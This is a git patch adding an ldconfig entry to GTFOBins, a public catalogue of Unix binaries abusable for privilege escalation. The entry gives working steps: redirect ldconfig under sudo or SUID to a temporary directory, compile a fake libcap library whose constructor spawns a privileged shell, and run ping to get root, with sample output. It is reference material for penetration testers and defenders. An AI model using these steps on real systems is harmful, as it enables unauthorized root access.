From 391d436fc5415798184098d1254783df7011abd5 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Wed, 14 Aug 2019 13:13:11 +0200 Subject: [PATCH] Add ldconfig Close #68. --- _gtfobins/ldconfig.md | 54 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 _gtfobins/ldconfig.md diff --git a/_gtfobins/ldconfig.md b/_gtfobins/ldconfig.md new file mode 100644 index 0000000..909f50a --- /dev/null +++ b/_gtfobins/ldconfig.md @@ -0,0 +1,54 @@ +--- +description: | + Follows a minimal example of how to use the described technique (details may change across different distributions). + + Run the code associated with the technique. + + Identify a target SUID executable, for example the `libcap` library of `ping`: + + ``` + $ ldd /bin/ping | grep libcap + libcap.so.2 => /tmp/tmp.9qfoUyKaGu/libcap.so.2 (0x00007fc7e9797000) + ``` + + Create a fake library that spawns a shell at bootstrap: + + ``` + echo '#include + + __attribute__((constructor)) + static void init() { + execl("/bin/sh", "/bin/sh", "-p", NULL); + } + ' >"$TF/lib.c" + ``` + + Compile it with: + + ``` + gcc -fPIC -shared "$TF/lib.c" -o "$TF/libcap.so.2" + ``` + + Run `ldconfig` again as described below then just run `ping` to obtain a root shell: + + ``` + $ ping + # id + uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user) + ``` +functions: + sudo: + - description: This allows to override one or more shared libraries. Beware though that it is easy to *break* target and other binaries. + code: | + TF=$(mktemp -d) + echo "$TF" > "$TF/conf" + # move malicious libraries in $TF + sudo ldconfig -f "$TF/conf" + limited-suid: + - description: This allows to override one or more shared libraries. Beware though that it is easy to *break* target and other binaries. + code: | + TF=$(mktemp -d) + echo "$TF" > "$TF/conf" + # move malicious libraries in $TF + ./ldconfig -f "$TF/conf" +---